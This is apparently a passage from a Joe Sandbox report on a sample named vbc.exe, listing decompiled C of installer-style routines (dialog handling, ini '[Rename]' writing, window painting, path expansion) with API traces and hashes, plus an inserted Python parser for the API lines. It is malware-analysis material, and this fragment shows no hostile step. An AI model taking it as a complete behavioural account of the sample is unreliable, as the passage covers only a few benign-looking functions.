                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                    • String ID: $M$N
                    • API String ID: 2564846305-813528018
                    • Opcode ID: d16f015aa7e03b3a4c7b4e3c21f51a65bb20fb0afa08736e4432fb14da1321df
                    • Instruction ID: cd3a3d13ac431be8b4ce3887d4b4ed089ddf64e85d32bcda767c16d05f8e906a
                    • Opcode Fuzzy Hash: d16f015aa7e03b3a4c7b4e3c21f51a65bb20fb0afa08736e4432fb14da1321df
                    • Instruction Fuzzy Hash: 8D028B70900609AFDB20DFA5CC45EAF7BB5FB85314F10817AE610BA2E1DB798941DF58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 93%
                    			E00404635(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                    				intOrPtr _v8;
                    				int _v12;
                    				void* _v16;
                    				struct HWND__* _t56;
                    				intOrPtr _t69;
                    				signed int _t75;
                    				signed short* _t76;
                    				signed short* _t78;
                    				long _t92;
                    				int _t103;
                    				signed int _t108;
                    				signed int _t110;
                    				intOrPtr _t113;
                    				WCHAR* _t114;
                    				signed int* _t116;
                    				WCHAR* _t117;
                    				struct HWND__* _t118;
                    
                    				if(_a8 != 0x110) {
                    					__eflags = _a8 - 0x111;
                    					if(_a8 != 0x111) {
                    						L13:
                    						__eflags = _a8 - 0x4e;
                    						if(_a8 != 0x4e) {
                    							__eflags = _a8 - 0x40b;
                    							if(_a8 == 0x40b) {
                    								 *0x79ff14 =  *0x79ff14 + 1;
                    								__eflags =  *0x79ff14;
                    							}
                    							L27:
                    							_t114 = _a16;
                    							L28:
                    							return E004044DD(_a8, _a12, _t114);
                    						}
                    						_t56 = GetDlgItem(_a4, 0x3e8);
                    						_t114 = _a16;
                    						__eflags =  *((intOrPtr*)(_t114 + 8)) - 0x70b;
                    						if( *((intOrPtr*)(_t114 + 8)) == 0x70b) {
                    							__eflags =  *((intOrPtr*)(_t114 + 0xc)) - 0x201;
                    							if( *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                    								_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                    								_t113 =  *((intOrPtr*)(_t114 + 0x18));
                    								_v12 = _t103;
                    								__eflags = _t103 - _t113 - 0x800;
                    								_v16 = _t113;
                    								_v8 = 0x7a6a00;
                    								if(_t103 - _t113 < 0x800) {
                    									SendMessageW(_t56, 0x44b, 0,  &_v16);
                    									SetCursor(LoadCursorW(0, 0x7f02));
                    									_push(1);
                    									E004048E4(_a4, _v8);
                    									SetCursor(LoadCursorW(0, 0x7f00));
                    									_t114 = _a16;
                    								}
                    							}
                    						}
                    						__eflags =  *((intOrPtr*)(_t114 + 8)) - 0x700;
                    						if( *((intOrPtr*)(_t114 + 8)) != 0x700) {
                    							goto L28;
                    						} else {
                    							__eflags =  *((intOrPtr*)(_t114 + 0xc)) - 0x100;
                    							if( *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                    								goto L28;
                    							}
                    							__eflags =  *((intOrPtr*)(_t114 + 0x10)) - 0xd;
                    							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                    								SendMessageW( *0x7a8a68, 0x111, 1, 0);
                    							}
                    							__eflags =  *((intOrPtr*)(_t114 + 0x10)) - 0x1b;
                    							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                    								SendMessageW( *0x7a8a68, 0x10, 0, 0);
                    							}
                    							return 1;
                    						}
                    					}
                    					__eflags = _a12 >> 0x10;
                    					if(_a12 >> 0x10 != 0) {
                    						goto L27;
                    					}
                    					__eflags =  *0x79ff14; // 0x0
                    					if(__eflags != 0) {
                    						goto L27;
                    					}
                    					_t69 =  *0x7a0f20; // 0x9f0f84
                    					_t29 = _t69 + 0x14; // 0x9f0f98
                    					_t116 = _t29;
                    					__eflags =  *_t116 & 0x00000020;
                    					if(( *_t116 & 0x00000020) == 0) {
                    						goto L27;
                    					}
                    					_t108 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                    					__eflags = _t108;
                    					 *_t116 = _t108;
                    					E00404498(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                    					E004048C0();
                    					goto L13;
                    				} else {
                    					_t117 = _a16;
                    					_t75 =  *(_t117 + 0x30);
                    					if(_t75 < 0) {
                    						_t75 =  *( *0x7a7a3c - 4 + _t75 * 4);
                    					}
                    					_t76 =  *0x7a8a98 + _t75 * 2;
                    					_t110 =  *_t76 & 0x0000ffff;
                    					_a8 = _t110;
                    					_t78 =  &(_t76[1]);
                    					_a16 = _t78;
                    					_v16 = _t78;
                    					_v12 = 0;
                    					_v8 = E004045E6;
                    					if(_t110 != 2) {
                    						_v8 = E004045AC;
                    					}
                    					_push( *((intOrPtr*)(_t117 + 0x34)));
                    					_push(0x22);
                    					E00404476(_a4);
                    					_push( *((intOrPtr*)(_t117 + 0x38)));
                    					_push(0x23);
                    					E00404476(_a4);
                    					CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                    					E00404498( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                    					_t118 = GetDlgItem(_a4, 0x3e8);
                    					E004044AB(_t118);
                    					SendMessageW(_t118, 0x45b, 1, 0);
                    					_t92 =  *( *0x7a8a70 + 0x68);
                    					if(_t92 < 0) {
                    						_t92 = GetSysColor( ~_t92);
                    					}
                    					SendMessageW(_t118, 0x443, 0, _t92);
                    					SendMessageW(_t118, 0x445, 0, 0x4010000);
                    					SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                    					 *0x79ff14 = 0;
                    					SendMessageW(_t118, 0x449, _a8,  &_v16);
                    					 *0x79ff14 = 0;
                    					return 0;
                    				}
                    			}

                    APIs
                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046D3
                    • GetDlgItem.USER32(?,000003E8), ref: 004046E7
                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404704
                    • GetSysColor.USER32 ref: 00404715
                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404723
                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404731
                    • lstrlenW.KERNEL32(?), ref: 00404736
                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404743
                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404758
                    • GetDlgItem.USER32(?,0000040A), ref: 004047B1
                    • SendMessageW.USER32(00000000), ref: 004047B8
                    • GetDlgItem.USER32(?,000003E8), ref: 004047E3
                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404826
                    • LoadCursorW.USER32 ref: 00404834
                    • SetCursor.USER32(00000000), ref: 00404837
                    • LoadCursorW.USER32 ref: 00404850
                    • SetCursor.USER32(00000000), ref: 00404853
                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404882
                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404894
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                    • String ID: Call$N
                    • API String ID: 3103080414-3438112850
                    • Opcode ID: 733b5ee76d40f44ee13d94ce5730b27edf6232bbb6d7c3eda73f746bb046eca6
                    • Instruction ID: dae4caa8b62e847b2ebc6bc8f7d7cc953444b28573a7dbce8249495b0b2e45c9
                    • Opcode Fuzzy Hash: 733b5ee76d40f44ee13d94ce5730b27edf6232bbb6d7c3eda73f746bb046eca6
                    • Instruction Fuzzy Hash: 5361A0B6900609BFDB10AF60DD85E6A7B69FB85314F00C43AF605B62D0C77CA961CF98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00406160(void* __ecx) {
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				long _t12;
                    				long _t24;
                    				char* _t31;
                    				int _t37;
                    				void* _t38;
                    				intOrPtr* _t39;
                    				long _t42;
                    				WCHAR* _t44;
                    				void* _t46;
                    				void* _t48;
                    				void* _t49;
                    				void* _t52;
                    				void* _t53;
                    
                    				_t38 = __ecx;
                    				_t44 =  *(_t52 + 0x14);
                    				 *0x7a55e8 = 0x55004e;
                    				 *0x7a55ec = 0x4c;
                    				if(_t44 == 0) {
                    					L3:
                    					_t2 = _t52 + 0x1c; // 0x7a5de8
                    					_t12 = GetShortPathNameW( *_t2, 0x7a5de8, 0x400);
                    					if(_t12 != 0 && _t12 <= 0x400) {
                    						_t37 = wsprintfA(0x7a51e8, "%ls=%ls\r\n", 0x7a55e8, 0x7a5de8);
                    						_t53 = _t52 + 0x10;
                    						E00406557(_t37, 0x400, 0x7a5de8, 0x7a5de8,  *((intOrPtr*)( *0x7a8a70 + 0x128)));
                    						_t12 = E0040600A(0x7a5de8, 0xc0000000, 4);
                    						_t48 = _t12;
                    						 *(_t53 + 0x18) = _t48;
                    						if(_t48 != 0xffffffff) {
                    							_t42 = GetFileSize(_t48, 0);
                    							_t6 = _t37 + 0xa; // 0xa
                    							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                    							if(_t46 == 0 || E0040608D(_t48, _t46, _t42) == 0) {
                    								L18:
                    								return CloseHandle(_t48);
                    							} else {
                    								if(E00405F6F(_t38, _t46, "[Rename]\r\n") != 0) {
                    									_t49 = E00405F6F(_t38, _t21 + 0xa, "\n[");
                    									if(_t49 == 0) {
                    										_t48 =  *(_t53 + 0x18);
                    										L16:
                    										_t24 = _t42;
                    										L17:
                    										E00405FC5(_t24 + _t46, 0x7a51e8, _t37);
                    										SetFilePointer(_t48, 0, 0, 0);
                    										E004060BC(_t48, _t46, _t42 + _t37);
                    										GlobalFree(_t46);
                    										goto L18;
                    									}
                    									_t39 = _t46 + _t42;
                    									_t31 = _t39 + _t37;
                    									while(_t39 > _t49) {
                    										 *_t31 =  *_t39;
                    										_t31 = _t31 - 1;
                    										_t39 = _t39 - 1;
                    									}
                    									_t24 = _t49 - _t46 + 1;
                    									_t48 =  *(_t53 + 0x18);
                    									goto L17;
                    								}
                    								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                    								_t42 = _t42 + 0xa;
                    								goto L16;
                    							}
                    						}
                    					}
                    				} else {
                    					CloseHandle(E0040600A(_t44, 0, 1));
                    					_t12 = GetShortPathNameW(_t44, 0x7a55e8, 0x400);
                    					if(_t12 != 0 && _t12 <= 0x400) {
                    						goto L3;
                    					}
                    				}
                    				return _t12;
                    			}

                    APIs
                    • CloseHandle.KERNEL32(00000000), ref: 0040619B
                    • GetShortPathNameW.KERNEL32 ref: 004061A4
                      • Part of subcall function 00405F6F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F7F
                      • Part of subcall function 00405F6F: lstrlenA.KERNEL32(00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB1
                    • GetShortPathNameW.KERNEL32 ref: 004061C1
                    • wsprintfA.USER32 ref: 004061DF
                    • GetFileSize.KERNEL32(00000000,00000000,007A5DE8,C0000000,00000004,007A5DE8,?,?,?,?,?), ref: 0040621A
                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406229
                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406261
                    • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,007A51E8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062B7
                    • GlobalFree.KERNEL32(00000000), ref: 004062C8
                    • CloseHandle.KERNEL32(00000000), ref: 004062CF
                      • Part of subcall function 0040600A: GetFileAttributesW.KERNELBASE(00000003,004030BD,007B6800,80000000,00000003,?,?,?,?,?,0040385A,?), ref: 0040600E
                      • Part of subcall function 0040600A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406030
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                    • String ID: %ls=%ls$[Rename]$Uz$]z$]z
                    • API String ID: 2171350718-2304911260
                    • Opcode ID: 83841883253fd663560c5337fe6472fb083831e0a70ac9398a254b13b8ba3a8f
                    • Instruction ID: 21e35848ad9e0a4f6d0f4344ae9360a4b2933efdadd7627ed2dc2072c6695f7b
                    • Opcode Fuzzy Hash: 83841883253fd663560c5337fe6472fb083831e0a70ac9398a254b13b8ba3a8f
                    • Instruction Fuzzy Hash: 2D313771600715BBD220BB659D48F2B3A5CDF86764F16003EFD42F62C2EA7C9821867D
                    Uniqueness

                    Uniqueness Score: -1.00%
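
The APIs lists in these entries (the one directly above included) use only a few line shapes: an API with its module and the captured argument column, a call recorded without arguments, and calls reached through a subcall of the function. A small parser for them is a practical triage helper, for example to pull the direct call sequence of a function for comparison across reports, or to find every call site that receives a given string literal such as `[Rename]`. The block below is the editor's added tooling, not part of Joe Sandbox or of this report; the grammar is inferred from the lines on this page and is an assumption, and the sample block is copied from the entry above.

```python
"""Parser for the "APIs" lines of a Joe Sandbox function entry (editor's added tooling)."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Line shapes taken from this page (assumed grammar; Joe Sandbox publishes none):
#   • Name.MODULE(arg,arg,...), ref: 0040621A
#   • Name.MODULE ref: 004061C1                                   (arguments not recorded)
#   • Part of subcall function 00405F6F: Name.MODULE(...), ref: 00405F7F
_API_LINE = re.compile(
    r"^\s*•?\s*"
    r"(?:Part of subcall function (?P<subcall>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_@]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    ref: int                        # call-site address from the "ref:" field
    args: list = field(default_factory=list)   # argument column as captured ("?" = unknown)
    subcall: Optional[int] = None   # callee address when the API was reached through a subcall
    raw: str = ""


def parse_api_line(line: str) -> Optional[ApiCall]:
    m = _API_LINE.match(line)
    if not m:
        return None
    args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
    sub = int(m["subcall"], 16) if m["subcall"] else None
    return ApiCall(m["name"], m["module"], int(m["ref"], 16), args, sub, line.strip())


def parse_api_block(text: str) -> list:
    """Parse an APIs section; non-matching lines (headers, strings) are skipped."""
    return [c for c in map(parse_api_line, text.splitlines()) if c is not None]


def direct_call_sequence(calls) -> list:
    """Names of the APIs the function body calls itself, in address order,
    leaving out calls attributed to subcalls; a compact feature for comparing
    entries across reports."""
    return [c.name for c in sorted(calls, key=lambda c: c.ref) if c.subcall is None]


def args_with_string(calls, needle: str) -> list:
    """Call sites whose captured arguments contain a given string literal."""
    return [c for c in calls if any(needle in a for a in c.args)]


# Sample block copied from the entry above (the report's own lines, used as test input).
SAMPLE = """\
APIs
• Part of subcall function 00405F6F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F7F
• GetShortPathNameW.KERNEL32 ref: 004061C1
• GetFileSize.KERNEL32(00000000,00000000,007A5DE8,C0000000,00000004,007A5DE8,?,?,?,?,?), ref: 0040621A
• lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406261
• CloseHandle.KERNEL32(00000000), ref: 004062CF
• Part of subcall function 0040600A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406030
Strings
"""

if __name__ == "__main__":
    for call in parse_api_block(SAMPLE):
        print(f"{call.ref:08X} {call.module}!{call.name} {call.args}")
```

The argument column is kept verbatim: a `?` means the sandbox could not recover the value, and values such as `[Rename]` are the string literals the tracer saw on the stack, which is why a search over `args` is the quickest way to locate where a given string is consumed.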

                    C-Code - Quality: 90%
                    			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                    				struct tagLOGBRUSH _v16;
                    				struct tagRECT _v32;
                    				struct tagPAINTSTRUCT _v96;
                    				struct HDC__* _t70;
                    				struct HBRUSH__* _t87;
                    				struct HFONT__* _t94;
                    				long _t102;
                    				signed int _t126;
                    				struct HDC__* _t128;
                    				intOrPtr _t130;
                    
                    				if(_a8 == 0xf) {
                    					_t130 =  *0x7a8a70;
                    					_t70 = BeginPaint(_a4,  &_v96);
                    					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                    					_a8 = _t70;
                    					GetClientRect(_a4,  &_v32);
                    					_t126 = _v32.bottom;
                    					_v32.bottom = _v32.bottom & 0x00000000;
                    					while(_v32.top < _t126) {
                    						_a12 = _t126 - _v32.top;
                    						asm("cdq");
                    						asm("cdq");
                    						asm("cdq");
                    						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                    						_t87 = CreateBrushIndirect( &_v16);
                    						_v32.bottom = _v32.bottom + 4;
                    						_a16 = _t87;
                    						FillRect(_a8,  &_v32, _t87);
                    						DeleteObject(_a16);
                    						_v32.top = _v32.top + 4;
                    					}
                    					if( *(_t130 + 0x58) != 0xffffffff) {
                    						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                    						_a16 = _t94;
                    						if(_t94 != 0) {
                    							_t128 = _a8;
                    							_v32.left = 0x10;
                    							_v32.top = 8;
                    							SetBkMode(_t128, 1);
                    							SetTextColor(_t128,  *(_t130 + 0x58));
                    							_a8 = SelectObject(_t128, _a16);
                    							DrawTextW(_t128, 0x7a7a60, 0xffffffff,  &_v32, 0x820);
                    							SelectObject(_t128, _a8);
                    							DeleteObject(_a16);
                    						}
                    					}
                    					EndPaint(_a4,  &_v96);
                    					return 0;
                    				}
                    				_t102 = _a16;
                    				if(_a8 == 0x46) {
                    					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                    					 *((intOrPtr*)(_t102 + 4)) =  *0x7a8a68;
                    				}
                    				return DefWindowProcW(_a4, _a8, _a12, _t102);
                    			}













                    [statement address column for E00401000, 0x0040100a to 0x00401178, detached from the listing above by extraction]

                    APIs
                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                    • BeginPaint.USER32(?,?), ref: 00401047
                    • GetClientRect.USER32 ref: 0040105B
                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                    • FillRect.USER32 ref: 004010E4
                    • DeleteObject.GDI32(?), ref: 004010ED
                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                    • SelectObject.GDI32(00000000,?), ref: 00401140
                    • DrawTextW.USER32(00000000,007A7A60,000000FF,00000010,00000820), ref: 00401156
                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                    • DeleteObject.GDI32(?), ref: 00401165
                    • EndPaint.USER32(?,?), ref: 0040116E
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                    • String ID: F
                    • API String ID: 941294808-1304234792
                    • Opcode ID: 8a25a35e32ca6dce8bd23cc7af0fa44a7ac16e68086679f93291a7c2c2804fa7
                    • Instruction ID: 94ee33a561faf14046f005448635b33146be7beb2ca28ebab25df4912e6f605d
                    • Opcode Fuzzy Hash: 8a25a35e32ca6dce8bd23cc7af0fa44a7ac16e68086679f93291a7c2c2804fa7
                    • Instruction Fuzzy Hash: 9E417C71800209AFCF058FA5DE459AF7BB9FF45315F00802AF991AA1A0CB789A55DFA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 72%
                    			E00406557(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                    				struct _ITEMIDLIST* _v8;
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				signed int _v28;
                    				signed int _t44;
                    				WCHAR* _t45;
                    				signed char _t47;
                    				signed int _t48;
                    				short _t59;
                    				short _t61;
                    				short _t63;
                    				void* _t71;
                    				signed int _t77;
                    				signed int _t78;
                    				short _t81;
                    				short _t82;
                    				signed char _t84;
                    				signed int _t85;
                    				void* _t98;
                    				void* _t104;
                    				intOrPtr* _t105;
                    				void* _t107;
                    				WCHAR* _t108;
                    				void* _t110;
                    
                    				_t107 = __esi;
                    				_t104 = __edi;
                    				_t71 = __ebx;
                    				_t44 = _a8;
                    				if(_t44 < 0) {
                    					_t44 =  *( *0x7a7a3c - 4 + _t44 * 4);
                    				}
                    				_push(_t71);
                    				_push(_t107);
                    				_push(_t104);
                    				_t105 =  *0x7a8a98 + _t44 * 2;
                    				_t45 = 0x7a6a00;
                    				_t108 = 0x7a6a00;
                    				if(_a4 >= 0x7a6a00 && _a4 - 0x7a6a00 >> 1 < 0x800) {
                    					_t108 = _a4;
                    					_a4 = _a4 & 0x00000000;
                    				}
                    				_t81 =  *_t105;
                    				_a8 = _t81;
                    				if(_t81 == 0) {
                    					L43:
                    					 *_t108 =  *_t108 & 0x00000000;
                    					if(_a4 == 0) {
                    						return _t45;
                    					}
                    					return E0040651A(_a4, _t45);
                    				} else {
                    					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                    						_t98 = 2;
                    						_t105 = _t105 + _t98;
                    						if(_t81 >= 4) {
                    							if(__eflags != 0) {
                    								 *_t108 = _t81;
                    								_t108 = _t108 + _t98;
                    								__eflags = _t108;
                    							} else {
                    								 *_t108 =  *_t105;
                    								_t108 = _t108 + _t98;
                    								_t105 = _t105 + _t98;
                    							}
                    							L42:
                    							_t82 =  *_t105;
                    							_a8 = _t82;
                    							if(_t82 != 0) {
                    								_t81 = _a8;
                    								continue;
                    							}
                    							goto L43;
                    						}
                    						_t84 =  *((intOrPtr*)(_t105 + 1));
                    						_t47 =  *_t105;
                    						_t48 = _t47 & 0x000000ff;
                    						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                    						_t85 = _t84 & 0x000000ff;
                    						_v28 = _t48 | 0x00008000;
                    						_t77 = 2;
                    						_v16 = _t85;
                    						_t105 = _t105 + _t77;
                    						_v24 = _t48;
                    						_v20 = _t85 | 0x00008000;
                    						if(_a8 != _t77) {
                    							__eflags = _a8 - 3;
                    							if(_a8 != 3) {
                    								__eflags = _a8 - 1;
                    								if(__eflags == 0) {
                    									__eflags = (_t48 | 0xffffffff) - _v12;
                    									E00406557(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                    								}
                    								L38:
                    								_t108 =  &(_t108[lstrlenW(_t108)]);
                    								_t45 = 0x7a6a00;
                    								goto L42;
                    							}
                    							_t78 = _v12;
                    							__eflags = _t78 - 0x1d;
                    							if(_t78 != 0x1d) {
                    								__eflags = (_t78 << 0xb) + 0x7a9000;
                    								E0040651A(_t108, (_t78 << 0xb) + 0x7a9000);
                    							} else {
                    								E00406461(_t108,  *0x7a8a68);
                    							}
                    							__eflags = _t78 + 0xffffffeb - 7;
                    							if(__eflags < 0) {
                    								L29:
                    								E004067A1(_t108);
                    							}
                    							goto L38;
                    						}
                    						if( *0x7a8ae4 != 0) {
                    							_t77 = 4;
                    						}
                    						_t121 = _t48;
                    						if(_t48 >= 0) {
                    							__eflags = _t48 - 0x25;
                    							if(_t48 != 0x25) {
                    								__eflags = _t48 - 0x24;
                    								if(_t48 == 0x24) {
                    									GetWindowsDirectoryW(_t108, 0x400);
                    									_t77 = 0;
                    								}
                    								while(1) {
                    									__eflags = _t77;
                    									if(_t77 == 0) {
                    										goto L26;
                    									}
                    									_t59 =  *0x7a8a64;
                    									_t77 = _t77 - 1;
                    									__eflags = _t59;
                    									if(_t59 == 0) {
                    										L22:
                    										_t61 = SHGetSpecialFolderLocation( *0x7a8a68,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                    										__eflags = _t61;
                    										if(_t61 != 0) {
                    											L24:
                    											 *_t108 =  *_t108 & 0x00000000;
                    											__eflags =  *_t108;
                    											continue;
                    										}
                    										__imp__SHGetPathFromIDListW(_v8, _t108);
                    										_a8 = _t61;
                    										__imp__CoTaskMemFree(_v8);
                    										__eflags = _a8;
                    										if(_a8 != 0) {
                    											goto L26;
                    										}
                    										goto L24;
                    									}
